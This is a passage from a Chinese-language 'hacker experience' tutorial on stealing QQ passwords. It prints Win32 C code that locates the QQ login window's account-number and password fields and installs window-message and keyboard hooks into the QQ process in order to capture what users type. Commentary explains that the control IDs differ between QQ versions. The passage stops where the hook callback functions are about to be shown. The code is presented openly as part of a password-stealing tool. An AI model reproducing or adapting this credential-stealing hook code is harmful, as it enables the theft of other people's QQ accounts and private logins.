黑客心得：盗QQ密码的软件模拟实现技术

核心提示： BOOL bRet = FALSE; if (hQQLogin != NULL) { DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //这是什么意思？看MSDN g_hNum = GetDlgItem(hQQLo

BOOL bRet = FALSE;

if (hQQLogin != NULL)

{

DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //这是什么意思？看MSDN

g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ，此处不一样！ 得到QQ号的子窗口句柄

g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ，此处不一样！得到QQ密码的子窗口句柄

if (g_hNum == NULL)

{

MessageBox(NULL,"哭了，号码句柄都没有得到！","郁闷",0);

return FALSE;

}

if(g_hPsw==NULL)

{

MessageBox(NULL,"哭了，密码句柄都没有得到！","郁闷",0);

return FALSE;

}

分别键盘HOOK，和界面部分消息处理的HOOK

g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);

g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);

bRet = (g_hProc != NULL) && (g_hKey != NULL);

}

else

{

// 卸载钩子

bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);

g_hProc = NULL;

g_hKey = NULL;

g_hNum = NULL;

}

return bRet;

}

上面是安装HOOK部分的代码，就这么简单，上面提到了CallWndProc，KeyboardProc是两个回调函数，是我第三部分要解释的钩子函数

第三部分：（3）钩子函数的解释

CallWndProc，KeyboardProc是两个回调函数的原型和具体代码如下：

// 钩子过程，监视“登陆”的命令消息